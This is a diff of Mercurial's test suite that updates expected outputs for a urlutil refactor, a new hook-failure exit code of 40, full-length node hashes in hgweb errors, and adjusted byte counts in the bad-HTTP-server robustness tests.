import unittest -from mercurial import hg +from mercurial.utils import urlutil class ParseRequestTests(unittest.TestCase): def testparse(self): self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor'), + urlutil.parseurl(b'http://example.com/no/anchor'), (b'http://example.com/no/anchor', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor#foo'), + urlutil.parseurl(b'http://example.com/an/anchor#foo'), (b'http://example.com/an/anchor', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']), + urlutil.parseurl( + b'http://example.com/no/anchor/branches', [b'foo'] + ), (b'http://example.com/no/anchor/branches', (None, [b'foo'])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']), + urlutil.parseurl( + b'http://example.com/an/anchor/branches#bar', [b'foo'] + ), (b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])), ) self.assertEqual( - hg.parseurl( + urlutil.parseurl( b'http://example.com/an/anchor/branches-None#foo', None ), (b'http://example.com/an/anchor/branches-None', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/'), + urlutil.parseurl(b'http://example.com/'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com'), + urlutil.parseurl(b'http://example.com'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com#foo'), + urlutil.parseurl(b'http://example.com#foo'), (b'http://example.com/', (b'foo', [])), ) diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -59,7 +59,7 @@ #if unix-permissions no-root $ chmod u-r $TESTTMP/included $ hg showconfig section - config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied) + config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob) [255] #endif @@ -84,7 +84,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ unset FAKEPATH diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort -*** Test urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-hgweb-commands.t b/tests/test-hgweb-commands.t --- a/tests/test-hgweb-commands.t +++ b/tests/test-hgweb-commands.t @@ -2193,7 +2193,8 @@ lookup pushkey stream-preferred - streamreqs=generaldelta,revlogv1,sparserevlog + streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !) + streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !) unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-hgweb-filelog.t b/tests/test-hgweb-filelog.t --- a/tests/test-hgweb-filelog.t +++ b/tests/test-hgweb-filelog.t @@ -656,7 +656,7 @@ An error occurred while processing your request: </p> <p> - a@6563da9dcf87: not found in manifest + a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest </p> </div> </div> diff --git a/tests/test-hgweb-json.t b/tests/test-hgweb-json.t --- a/tests/test-hgweb-json.t +++ b/tests/test-hgweb-json.t @@ -2190,6 +2190,10 @@ "topic": "phase" }, { + "summary": "removes files not tracked by Mercurial", + "topic": "purge" + }, + { "summary": "roll back an interrupted transaction", "topic": "recover" }, diff --git a/tests/test-hgweb.t b/tests/test-hgweb.t --- a/tests/test-hgweb.t +++ b/tests/test-hgweb.t @@ -149,7 +149,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] $ get-with-headers.py localhost:$HGPORT 'file/tip/bork' 404 Not Found @@ -202,7 +202,7 @@ An error occurred while processing your request: </p> <p> - bork@2ef0ac749a14: not found in manifest + bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest </p> </div> </div> @@ -218,7 +218,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] try bad style diff --git a/tests/test-hgwebdir.t b/tests/test-hgwebdir.t --- a/tests/test-hgwebdir.t +++ b/tests/test-hgwebdir.t @@ -103,7 +103,7 @@ 404 Not Found - error: bork@8580ff50825a: not found in manifest + error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest [1] should succeed diff --git a/tests/test-histedit-edit.t b/tests/test-histedit-edit.t --- a/tests/test-histedit-edit.t +++ b/tests/test-histedit-edit.t @@ -375,7 +375,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt f @@ -400,7 +400,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] diff --git a/tests/test-histedit-fold.t b/tests/test-histedit-fold.t --- a/tests/test-histedit-fold.t +++ b/tests/test-histedit-fold.t @@ -202,7 +202,7 @@ transaction abort! rollback completed abort: pretxncommit.abortfolding hook failed - [255] + [40] $ cat .hg/last-message.txt f diff --git a/tests/test-histedit-non-commute-abort.t b/tests/test-histedit-non-commute-abort.t --- a/tests/test-histedit-non-commute-abort.t +++ b/tests/test-histedit-non-commute-abort.t @@ -84,6 +84,7 @@ ancestor path: e (node 0000000000000000000000000000000000000000) other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f) extra: ancestorlinknode = 0000000000000000000000000000000000000000 + extra: merged = yes $ hg resolve -l U e diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -227,7 +227,7 @@ HG_PATS=[] abort: pre-identify hook exited with status 1 - [255] + [40] $ hg cat b pre-cat hook: HG_ARGS=cat b HG_HOOKNAME=pre-cat @@ -390,7 +390,7 @@ HG_TAG=fa abort: pretag.forbid hook exited with status 1 - [255] + [40] $ hg tag -l fla pretag hook: HG_HOOKNAME=pretag HG_HOOKTYPE=pretag @@ -405,7 +405,7 @@ HG_TAG=fla abort: pretag.forbid hook exited with status 1 - [255] + [40] pretxncommit hook can see changeset, can roll back txn, changeset no more there after @@ -451,7 +451,7 @@ rollback completed abort: pretxncommit.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -485,7 +485,7 @@ HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10 abort: precommit.forbid hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -644,7 +644,7 @@ HG_URL=file:$TESTTMP/a abort: prepushkey hook exited with status 1 - [255] + [40] $ cd ../a test that prelistkeys can prevent listing keys @@ -679,7 +679,7 @@ HG_NAMESPACE=bookmarks abort: prelistkeys hook exited with status 1 - [255] + [40] $ cd ../a $ rm .hg/hgrc @@ -704,7 +704,7 @@ HG_URL=file:$TESTTMP/a abort: prechangegroup.forbid hook exited with status 1 - [255] + [40] pretxnchangegroup hook can see incoming changes, can roll back txn, incoming changes no longer there after @@ -735,7 +735,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 3:07f3376c1e65 @@ -786,7 +786,7 @@ HG_SOURCE=pull abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] outgoing hooks work for local clones @@ -825,7 +825,7 @@ HG_SOURCE=clone abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] $ cd "$TESTTMP/b" @@ -915,7 +915,7 @@ hooktype preoutgoing source pull abort: preoutgoing.fail hook failed - [255] + [40] $ echo '[hooks]' > ../a/.hg/hgrc $ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc @@ -1283,7 +1283,7 @@ rollback completed strip failed, backup bundle stored in * (glob) abort: pretxnclose.error hook exited with status 1 - [255] + [40] $ hg recover no interrupted transaction available [1] @@ -1306,7 +1306,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a (check (in)visibility of new changeset while transaction running in @@ -1331,7 +1331,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Hook from untrusted hgrc are reported as failure ================================================ @@ -1382,7 +1382,7 @@ rollback completed abort: untrusted hook pretxnclose.testing not executed (see 'hg help config.trusted') - [255] + [40] $ hg log changeset: 0:3903775176ed tag: tip @@ -1407,12 +1407,12 @@ $ cat << EOF >> .hg/hgrc > [hooks] - > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} - > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}" + > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-yes:run-with-plain=yes - > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-no:run-with-plain=no - > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-auto:run-with-plain=auto > EOF diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -13,6 +13,7 @@ > fakeversion = `pwd`/fakeversion.py > [format] > sparse-revlog = no + > use-persistent-nodemap = no > [devel] > legacy.exchange = phases > [server] @@ -118,17 +119,17 @@ readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1? from *) -> (1?) Accept-Encoding* (glob) read limit reached; closing socket @@ -163,17 +164,17 @@ readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -228,17 +229,17 @@ readline(234 from *) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !) - sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !) + sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 463\r\n (no-py3 !) + write(21) -> Content-Length: 444\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob) @@ -296,7 +297,7 @@ Traceback (most recent call last): Exception: connection closed after sending N bytes - write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) + write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !) $ rm -f error.log @@ -307,7 +308,7 @@ $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone - abort: HTTP request error (incomplete response; expected 450 bytes got 20) + abort: HTTP request error (incomplete response; expected 431 bytes got 20) (this may be an intermittent network failure; if the error persists, consider contacting the network or server operator) [255] @@ -320,17 +321,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(20 from 450) -> (0) batch branchmap bund (py36 !) - write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !) + sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(20 from 431) -> (0) batch branchmap bund (py36 !) + write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !) write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !) write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !) write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !) + write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !) write(2 from 2) -> (20) \r\n (no-py3 !) - write(20 from 450) -> (0) batch branchmap bund (no-py3 !) + write(20 from 431) -> (0) batch branchmap bund (no-py3 !) write limit reached; closing socket $LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob) Traceback (most recent call last): @@ -341,7 +342,7 @@ Server sends incomplete headers for batch request - $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is horrible @@ -363,17 +364,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (568) \r\n (no-py3 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (549) \r\n (no-py3 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -401,7 +402,7 @@ Server sends an incomplete HTTP response body to batch request - $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > 